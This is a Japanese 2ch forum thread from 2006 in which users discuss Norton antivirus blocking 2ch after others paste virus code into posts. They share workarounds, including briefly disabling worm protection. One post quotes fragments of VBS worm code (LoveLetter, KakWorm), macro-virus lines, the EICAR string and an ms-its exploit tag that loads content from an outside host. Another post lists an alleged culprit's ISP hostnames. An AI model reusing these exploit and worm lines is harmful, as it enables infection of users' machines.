X



トップページ運用情報
981コメント274KB
ノートン誤作動対策本部
レス数が950を超えています。1000を超えると書き込みができなくなります。
0001動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 16:08:40ID:bR9gbCGm0
詳細: 侵入を検出して遮断しました。 news19.2ch.net(206.223.151.67) とのすべての通信は 30 分間にわたって遮断されます。
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス
0872動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/03(土) 23:06:24ID:uTPZaxbS0
test
0874870
垢版 |
2006/06/03(土) 23:38:39ID:LY3W2bvD0
書き込まず読み込むだけで
インターネットワーム防止→AutoBlockルール
にその板の2ちゃんアドレスが書き込まれます

もちろん「侵入を検知して遮断しました」と言われるわけですが


「HTTP MSIE JavaScript OnLoad Rte CodeExec」のチェックを外せば
読み込めますが、うざすぎ
0876動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/04(日) 09:39:07ID:SyplLNft0
ノートン捨てた。ソースネクストにした。良かった。
0880動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/04(日) 22:55:29ID:zBN5dg8i0
つーか、誤動作というより2ch管理人が
HTTP MSIE JavaScript OnLoad Rte CodeExec送信してアクセス妨害しているだけだし

ノートン入れられると2chにとって都合の悪い利用者のハッキングができないから
どーしてもノートンを外させたいらしいね
0882動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/05(月) 11:14:26ID:9IAVDNee0
>>835
表示されたファイルをAuto−Protectの除外リストに加える。
シマンテック
ttp://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/7c3ff4677729271685256c470046ed2e/d9265b84ded9587488256b0400811ff7
0884882
垢版 |
2006/06/05(月) 12:47:48ID:9IAVDNee0
>>883
貴重なご意見ありがとうございます。
今後の参考にさせていただきます。
0888動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/10(土) 14:13:07ID:B1kyHaxf0
//<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

これってNIS2003でどう対処すればいいですかね
ttp://mickey.mirv.net/2chnis.html とかもやってみたけど効果なかった。
0889動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/10(土) 14:37:07ID:vbM5yPaN0
2ちゃんねるWiki
http://info.2ch.net/wiki/pukiwiki.php?%A3%B2%A4%C1%A4%E3%A4%F3%A4%CD%A4%EBWiki
ノートン入れたら2chに書きこめない人へ
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8
ノートン応急対策
http://info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures
0891動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/11(日) 03:59:21ID:NXtyf/QL0
むしろウイルスコード貼ったヤツは強制フシアナになるようにすればいいんだよ。
どこの誰がやっているか一発でわかるしww
0893動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/11(日) 05:18:57ID:YJ3RbPRP0
>>890-891
↓ウイルスコードを貼って、マッチ&ポンプでノートンなどを叩いている犯人の一人の紹介スレ。


(アンチウイルスNOD32厨とインテル厨とペストパトロール厨を兼ねている)
http://tmp6.2ch.net/test/read.cgi/tubo/1145644897/
http://66.102.7.104/search?q=cache:yFC7aJM6xCgJ:l-lab.org/pukiwiki/pukiwiki.php
http://z-temp.hp.infoseek.co.jp/2ch/Prescott699-.html
http://pc8.2ch.net/test/read.cgi/pcnews/1132667241/
http://science3.2ch.net/test/read.cgi/infosys/1088029040/
過去に確認されたリモホ
osaknt01.ap.so-net.ne.jp
osaka-ip.dti.ne.jp
acca.osaka.ocn.ne.jp
ppp.prin.ne.jp(PHS)
0895動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/11(日) 10:41:08ID:bxlw8H2ZO
いまさらウイルスコードでギャーギャー騒ぐ奴ってなんなの?


馬鹿なの?
0898動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/11(日) 13:11:01ID:OGt9xJAc0
今日ちょうどギャーギャー騒いでる奴見かけたところだw

642 名前:名無しさん@ゴーゴーゴーゴー! [sage] 投稿日:2006/06/11(日) 03:26:36 ID:aqYcE6Jh
だれだ最近、避難所にウイルスコード貼る奴。
専ブラがおかしくなって、そのたびに削除→ダウンロードしなおし→お気に入り登録しなおし、すごい手間、めちゃくちゃ迷惑。

643 名前:名無しさん@ゴーゴーゴーゴー! [sage] 投稿日:2006/06/11(日) 07:23:59 ID:QvemZE+C
>>642
それって難民フォルダーにあるsubject.txt(専ブラによって名称違うかも)を上書きするだけで直るよ
0901動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/17(土) 01:58:39ID:KdVQpFu60
Norton使わなきゃいいだけの話なのに
何でこんなに盛り上がってんの?

Symantecがクソなだけだろ。
2chがそこまで面倒見る必要ないよ。
0902動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/17(土) 02:10:57ID:c15+vmjg0
             _,..--‐‐‐‐‐-...,_    
           /:::::::::::::::::::::::::::::::::::'.,    
          /:::::::::::::::::::::::::::::::::::::::::::::::..    
          i,  NOD32厨   ::::::::::::, 
          ゝ  /'  '\    :::::::::::'
           . -・=-, 、-・=-  ::::::::::;'     
           |  .,ノ(・ ・ ( ⌒  ::6)      
           .l ┃トョヨコイ┃  .ソ  < Norton使わなきゃいいだけの話なのに   
           ヽ┃`ニ'´ ┃ ,.i-、  
             ,`~,'i' "~ /  ,>"'-、  
0907動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
まぁ、私の場合は

NAVが反応→NAVのオプションから
インターネットワーム防止>AutoBlockルール>全ての遮断を解除
して、インターネットワーム防止を解除(警告が出るので、OKを押しておく)
→2chブラウザのログを取得して、ウィルスコードの部分をローカルあぼーん

で、難なくNAVを使っているわけだが。
0910動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
>>909
NAVが反応→2ch鯖が遮断
              ↓
NAVを起動して、オプションにアクセス。インターネットワーム防止をクリック
              ↓
AutoBlockルールをクリックして、全ての遮断を解除をクリック
              ↓
インターネットワーム防止をオンにするのチェックを外す>OKを押す
              ↓
保護の警告ダイヤログが出る。
停止時間を15分、1時間、5時間、システム再起動まで、永久的から選択可能。
OKを押すとインターネットワーム防止機能が停止。
              ↓
ログを取得して、ウィルスコードが書かれたレスを
2chブラウザのローカルあぼーん機能で削除する。
#ブラウザ上あぼーんでも、取得したdatには残るソフトでは駄目かも。
              ↓
インターネットワーム防止機能を復帰させる。
0912動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/18(日) 01:59:16ID:KtKK/xzI0
わからない五大理由改

<ノートントラップにかかる六大理由>
1. 読まない ・・・対処法は書いてあるのに読まない。読む気などさらさらない。
2. 調べない ・・・過去スレ、ググるなど最低限の内容も自分で調べようとしない。
3. 試さない ・・・めんどくさいなどの理由で実行しない。する気もない。
4. 理解力が足りない ・・・理解力以前の問題で理解しようとしない。
5. 人を利用することしか頭にない ・・・甘え根性でその場を乗り切ろうとする。
6. それでもノートンを使う ・・・上記に該当するのに、誤作動を仕様と言って直さない糞ソフトに大事なお金を垂れ流す。
0914動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/18(日) 11:43:16ID:6mehq8cj0
>912
>5. 人を利用することしか頭にない ・・・甘え根性でその場を乗り切ろうとする。

それを世間一般では、『 要領がいい 』又は『 狡い 』という。
912は、要領の悪い世間知らずのヒッキーか?

0915動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/18(日) 13:19:15ID:XZEJdYVF0
現在回避できないノートントラップなどあるでしょうか?
特にノートンじゃなくても良いのですが、他の不具合が出るとか、
ありますでしょうか。

私は早々にノートンから他のセキュリティー製品に切り替えてしまったので、その辺りが解らないので質問させていただきました。。
0916動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/19(月) 10:42:39ID:V5zd1Xkf0
アバストも駄目
0918動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/19(月) 23:36:55ID:1dSp2Mu/0
>>912
ノートンを誤作動とか言ってる時点でわかってないじゃない
0919動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/21(水) 23:07:21ID:N0YkyuI90
NIS2006なんだけど対策教えて下さい
0921動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/22(木) 08:01:45ID:z+Bj6crv0
>>920
一応レス後半やまとめサイトの2005のをやった後に一時的によくなったんですが
ダメな板はダメで、その後>>13とかやったんですけどはじかれちゃうんですよ。
他にありませんかね。
30分待てば又スレ読めますので教えてください
0928動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/23(金) 19:48:23ID:AL1OlihM0
>>917 さん
返信ありがとうございます、参考にさせていただきます。

>>916 さん
情報ありがとうございます
アバストについては自分で調べてみます。
0929915-928
垢版 |
2006/06/24(土) 08:42:08ID:2lOlEW2f0
928の後、調べたところ、
アバストも設定で回避できるということがわかりました、
ノートンも確認済み。

(微妙にすれ違い失礼しました。)
0930動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/25(日) 19:10:33ID:nPZXTUgCO
コードの野郎どこにありやがる
0936動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/25(日) 20:40:15ID:qn/6XT870
NIS2005の場合(多分NIS2006も同じ)
タスクトレイのNISアイコンを左クリック>「Norton Internet Securityを開く」
NISが開いたら、左側の一覧から「Norton Internet Security」を選ぶ
システムの状態一覧から「ファイアーウォール」を選ぶ
左下にある「設定」ボタンを選ぶ
「ネットワーク」タブを選ぶ
「信頼」タブを選ぶ
「追加」を選ぶ
「個別」を選ぶ
アドレスに以下の数字の塊を一行でコピペする   ← ここで、コピペができません。どうしたらいいですか?



0938動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/25(日) 20:45:26ID:qn/6XT870
>>937
できました。 ありがとうございました。
0939動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/26(月) 23:19:03ID:04A0pu1O0
とあるスレ一覧更新したら「WScript.KakWorm」の警告がでます
どうやって誤検知除外したらいいのでしょうか?
0940動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/27(火) 09:46:13ID:uiyLh7K90
つーか、例の構文貼られても遮断しなくなった。
ノートン側が折れて対応したって事なのか?
0944ベースボール
垢版 |
2006/06/27(火) 23:48:05ID:1VQnoBRk0
ノーd使うころには てめえら死んでんだろ
0945動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/30(金) 05:12:55ID:uE8DR0NH0
⊂二二二( ^ω^)二⊃ブーン
0946動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/01(土) 17:16:01ID:NsDJ2PXW0
ttp://info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures
のノートン緊急対策を見て、アドレスに大量のIPアドレスを貼って、これで大丈夫だと思ったら、
芸スポの中田のスレで、またウィルス貼られてるし。
でも前と違って、他のスレは全部すぐ読める。前は30分遮断されたけど。
これは別の種類のなんちゃってウィルスかな?もうどうしたらいいかわからん。
次々といろんなコード貼るから、疲れる・・・
0947動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/01(土) 22:26:46ID:nhdTqzQc0
さっきから同じファイルばっかり表示して感染してる感染してるってノートンが騒いで
ます。まじめにうざいので黙らせる方法を教えてください。
0949動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/01(土) 22:40:44ID:nhdTqzQc0
そういえば。この間延長キーを購入したんですが、支払って二週間たっても延長キー
とやらが添付されたメールが届かないんですよ。ウイルスバスターとかも
こんなもんなの?
0950動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/01(土) 23:27:31ID:p7Wa9d7a0
>>910
すみません。便乗質問になってしまいますが。

最近NAV2004からNIS2006に切り替えたので、>>910 の設定を見かけて
ついでにやっておこうと思ったのですが、
「インターネットワーム防止」と言う項目が見つかりません。
これはNAVパッケージにしかない項目なのでしょうか。
NISの場合は何処を設定すると良いのでしょうか。
0953動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/01(土) 23:56:56ID:p7Wa9d7a0
>>951,952

ありがとうございます。
「インターネットワーム防止」だけで検索していたのでは見つかりませんね。
「NIS」検索で見つかりました。
>>842の方法で、つまりNISでは「インターネットワーム防止」を設定ではなくて、
http://mickey.mirv.net/2chnis.html のIP一覧を追加する、ですね。
0958御法川将貴
垢版 |
2006/07/04(火) 23:58:50ID:b4n0I43F0
名無しさんの助言は 今すぐ立ち去れ
0959御法川将貴
垢版 |
2006/07/05(水) 21:12:56ID:UnaLYAnA0
変態熊本県民が 万引きしたぞー
0960動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/08(土) 10:08:59ID:VMXk0zCF0
ためしにNAVの設定元に戻してみたら
引っかからなくなってるような。(<body onload=w****w()>)
シマンテックが対策した?
NISはもってないからわからんけど。
0963960
垢版 |
2006/07/09(日) 00:04:04ID:1L5D8Za90
vbsウイルスのソースじゃなくて侵入を検出して遮断しました、の
やつだよ。
0966動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/09(日) 09:18:36ID:HhYehN6h0
もう頭悪いからノーdの設定ができない。
自分の常連のスレ片っ端から張られてギコだめだし、
IEで見るようになった。
もう更新やめて別のアンチウィルスソフトにするかな。
それまで我慢してだ。
でもシマンテックの客が減るよな〜。
0967960
垢版 |
2006/07/09(日) 09:34:50ID:1L5D8Za90
>>965
ってか
このスレは侵入を検出して遮断しました用のスレだと思ってた。
vbsウイルスのソースに誤反応、のスレは他にあるし。。
0968960
垢版 |
2006/07/09(日) 09:58:03ID:1L5D8Za90
あ、レス読み違えたスマソ
うちでは何故かnavの設定戻して一度も開いたことないスレのログ取ってみても再現しない。
nav2005です。vbsウイルス用のフォルダ除外の設定はそのまま。
0970960
垢版 |
2006/07/09(日) 14:37:40ID:1L5D8Za90
>>969
>>687以降参照。
NISだけの現象なら始めからこのスレにくることもなかったわけだが。。
レス数が950を超えています。1000を超えると書き込みができなくなります。

ニューススポーツなんでも実況